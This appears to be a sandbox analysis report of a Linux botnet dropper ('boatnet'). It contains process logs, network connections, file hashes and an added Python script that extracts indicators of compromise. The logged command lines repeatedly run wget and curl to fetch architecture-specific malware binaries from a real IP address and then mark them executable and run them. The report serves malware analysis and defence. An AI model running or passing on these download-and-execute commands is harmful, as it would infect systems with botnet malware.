[chmod +x boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/chmod
[chmod +x boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm5]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm6]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm7]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.ppc]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.spc]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.m68k]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.sh4]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
memory/1440-1-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1449-2-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1458-3-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1467-4-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1476-5-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1534-6-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1562-7-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1573-8-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1582-9-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1591-10-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1602-11-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1611-12-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1620-13-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1639-14-0x0000000008048000-0x000000000805ce08-memory.dmp
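Added example, not code from the sandbox report or from the malware it describes: a small Python IOC extractor run over abridged copies of the command lines listed under Processes and rows from the Network table above. It pulls the download URLs, the payload host, the architecture suffixes the dropper cycles through (including the odd "i468" name the report shows), a per-endpoint count that separates the port-80 payload fetches from the port-3778 connections, and the names passed to chmod +x that are not downloaded payloads (unrelated /tmp entries there suggest the script runs chmod over the whole directory; that reading is an inference). The report does not attribute the 3778 flows to a process, so the "C2 candidate" label is an inference and is marked as such. The parser also tolerates the shifted protocol column that page extraction left in some table rows. Sample lines are constructed from the report and abridged; all function names are the example's own.

```python
"""IOC summary built from a sandbox report's Processes and Network sections.

Added example, not part of the report or of the malware: the parsing logic and
the role labels are this example's own assumptions.
"""
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed sample: command lines as listed under "Processes" (abridged; the
# chmod argument list is cut down to a few of the entries the report shows).
PROCESS_LINES = [
    "[/tmp/ohshit.sh]",
    "[wget http://94.156.71.225/hiddenbin/boatnet.x86]",
    "[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]",
    "[cat boatnet.x86]",
    "[chmod +x boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp WTF]",
    "[./WTF]",
    "[wget http://94.156.71.225/hiddenbin/boatnet.mips]",
    "[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]",
    "[./WTF]",
    "[wget http://94.156.71.225/hiddenbin/boatnet.i468]",
    "[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]",
    "[./WTF]",
    "[wget http://94.156.71.225/hiddenbin/boatnet.sh4]",
]

# Constructed sample: rows from the "Network" table (abridged), including two
# rows in the shifted form the extracted page uses for empty Domain cells.
NETWORK_ROWS = [
    "| N/A | 224.0.0.251:5353 | udp | |",
    "| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |",
    "| NL | 94.156.71.225:3778 | | tcp |",
    "| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |",
    "| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |",
    "| NL | 94.156.71.225:3778 | tcp | |",
]

URL_RE = re.compile(r"https?://[^\s\]]+")


def extract_urls(lines):
    """Distinct download URLs referenced by the wget/curl command lines."""
    return sorted({m.group(0) for line in lines for m in URL_RE.finditer(line)})


def payload_names(urls):
    """Basename of each payload, e.g. boatnet.x86."""
    return [urlparse(u).path.rsplit("/", 1)[-1] for u in urls]


def architectures(urls):
    """Architecture suffixes the dropper tries, taken from the payload names."""
    return sorted({n.split(".", 1)[1] for n in payload_names(urls) if "." in n})


def parse_network_row(row):
    """(ip, port, proto) from one table row; the protocol is read as the last
    non-empty cell after Destination, so rows with an empty Domain cell and a
    left-shifted 'tcp'/'udp' parse the same as well-formed ones."""
    fields = [f.strip() for f in row.strip().strip("|").split("|")]
    ip, port = fields[1].rsplit(":", 1)
    proto = next(f for f in reversed(fields[2:]) if f)
    return ip, int(port), proto


def endpoint_counts(rows):
    """How many times each (ip, port, proto) endpoint was contacted."""
    return Counter(parse_network_row(r) for r in rows)


def classify_endpoints(rows, urls):
    """Label each endpoint by what the report supports: a port that appears in
    a download URL is the payload-download port; another port on the same host
    is only a C2 candidate (the report does not tie those flows to a process,
    so that label is an inference); anything else is treated as background."""
    hosts = {urlparse(u).hostname for u in urls}
    download_ports = {urlparse(u).port or 80 for u in urls}
    roles = {}
    for (ip, port, proto), hits in endpoint_counts(rows).items():
        if ip in hosts and port in download_ports:
            role = "payload download"
        elif ip in hosts:
            role = "other connection to payload host (C2 candidate, inferred)"
        else:
            role = "not attributable to the dropper (sandbox/OS traffic)"
        roles[(ip, port, proto)] = (hits, role)
    return roles


def non_payload_chmod_targets(lines, urls):
    """Names passed to 'chmod +x' that are not downloaded payloads."""
    payloads = set(payload_names(urls))
    targets = set()
    for line in lines:
        if line.startswith("[chmod +x "):
            targets.update(line[len("[chmod +x "):-1].split())
    return targets - payloads


def summarize(process_lines=PROCESS_LINES, network_rows=NETWORK_ROWS):
    """Everything a triage note would want, as one dict."""
    urls = extract_urls(process_lines)
    return {
        "download_urls": urls,
        "payload_hosts": sorted({urlparse(u).hostname for u in urls}),
        "architectures": architectures(urls),
        "endpoints": classify_endpoints(network_rows, urls),
        "non_payload_chmod_targets": sorted(non_payload_chmod_targets(process_lines, urls)),
    }


if __name__ == "__main__":
    for key, value in summarize().items():
        print(f"{key}: {value}")
```

Running the block prints the summary; the useful outputs for blocking are the payload host, the download URL prefix and the port-3778 endpoint, while the architecture list tells you which of the dropped files (only boatnet.x86 is hashed in the report) will actually execute on a given victim.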